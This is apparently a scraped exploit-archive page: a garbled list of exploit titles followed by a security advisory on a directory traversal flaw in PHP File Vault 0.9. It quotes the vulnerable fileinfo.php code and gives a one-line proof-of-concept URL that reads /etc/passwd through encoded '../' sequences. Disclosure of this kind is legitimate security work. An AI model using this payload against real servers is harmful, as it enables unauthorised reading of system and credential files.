9680c9c2cb
6 new exploits Invision Power Board <= 3.0.4_ <= 3.0.4_ <= 2.3.6 - LFI and SQL Injection Invision Power Board <= 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI and SQL Injection Linux/x86 - connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes) Linux/x86 - Connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes) Linux/x86 - quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes) Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes) Win32 - connectback_ receive_ save and execute shellcode Win32 - Connectback_ receive_ save and execute shellcode DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow DVD X Player 5.5 Professional - (.plf) Universal Buffer Overflow DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP+ASLR Bypass) DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass) ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities ISC BIND <= 8.2.2 / IRIX <= 6.5.17 / Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities LedgerSMB1.0/1.1_SQL-Ledger 2.6.x Login Parameter Local File Include And Authentication Bypass Vulnerabilities LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Include And Authentication Bypass Vulnerabilities Lighttpd <= 1.4.15 - Multiple Code Execution_ Denial of Service and Information Disclosure Vulnerabilities Lighttpd <= 1.4.15 - Multiple Code Execution + Denial of Service + Information Disclosure Vulnerabilities Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow Privilege Escalation Windows TrackPopupMenu Win32k NULL Pointer Dereference Windows - TrackPopupMenu Win32k NULL Pointer Dereference ManageEngine OpManager_ Social IT Plus and IT360 - Multiple Vulnerabilities ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities Wikipad 1.6.0 - Cross-Site Scripting_ HTML Injection and Information Disclosure Vulnerabilities Wikipad 1.6.0 - Cross-Site Scripting + HTML Injection + Information Disclosure Vulnerabilities concrete5 5.5.2.1 Information Disclosure_ SQL Injection and Cross Site Scripting Vulnerabilities concrete5 5.5.2.1 - Information Disclosure + SQL Injection + Cross Site Scripting Vulnerabilities RuubikCMS 1.1.x Cross Site Scripting_ Information Disclosure and Directory Traversal Vulnerabilities RuubikCMS 1.1.x - Cross Site Scripting + Information Disclosure + Directory Traversal Vulnerabilities Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058) Windows Kernel - Win32k.sys Privilege Escalation Exploit (MS14-058) Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution Tiki-Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution PHP 7.0.8_ 5.6.23 and 5.5.37 - bzread() Out-of-Bounds Write PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit) PHP File Vault 0.9 - Directory Traversal Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access
65 lines
1.9 KiB
Text
Executable file
65 lines
1.9 KiB
Text
Executable file
PHP File Vault version 0.9 , remote directory traversal and read file vulnerabilty
|
|
==================================================================================
|
|
|
|
|
|
Discovered by N_A, N_A[at]tutanota.com
|
|
======================================
|
|
|
|
|
|
|
|
|
|
Description
|
|
===========
|
|
|
|
|
|
A very small PHP website application which stores anonymously uploaded files and retrieves them by SHA1 hash (a fingerprint of the file which is provided after uploading). Developed for anonysource.org , a kanux project.
|
|
|
|
https://sourceforge.net/projects/php-file-vault
|
|
|
|
|
|
|
|
Vulnerability
|
|
=============
|
|
|
|
|
|
The vulnerability exists within the fileinfo.php file of the package:
|
|
|
|
|
|
A A A if (empty($_GET['sha1'])) die("sha1 is required to get file info");
|
|
A A A $sha1 = trim($_GET['sha1']);
|
|
|
|
|
|
the 'sha1' variable is requested via the GET method. It is passed as a variable to the 'parseFileInfo' function. This function incorporates a call to
|
|
the fopen() function within PHP:
|
|
|
|
|
|
|
|
A A A A A A function parseFileInfo($fi) {
|
|
A A A A A A $fh = fopen($fi,'r');
|
|
A A A A A A $fname = trim(fgets($fh));
|
|
A A A A A A fclose($fh);
|
|
A A A A A A return array($fname);
|
|
A A A A A }
|
|
|
|
|
|
|
|
The parseFileInfo() function is called within the file fileinfo.php with the 'sha1' variable inside:
|
|
|
|
A A A A A A if (!is_readable(FI.$sha1)) die("cannot read file info!");
|
|
A A A A A A list($fname) = parseFileInfo(FI.$sha1);
|
|
|
|
A A A A A A readfile('head.html');
|
|
|
|
A A A A A A if ($fname) echo "<h1><a href=\"/$sha1\">$fname</a></h1>";
|
|
|
|
|
|
This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker.
|
|
|
|
Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on.
|
|
|
|
|
|
Proof Of Concept
|
|
================
|
|
|
|
PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
|
|
|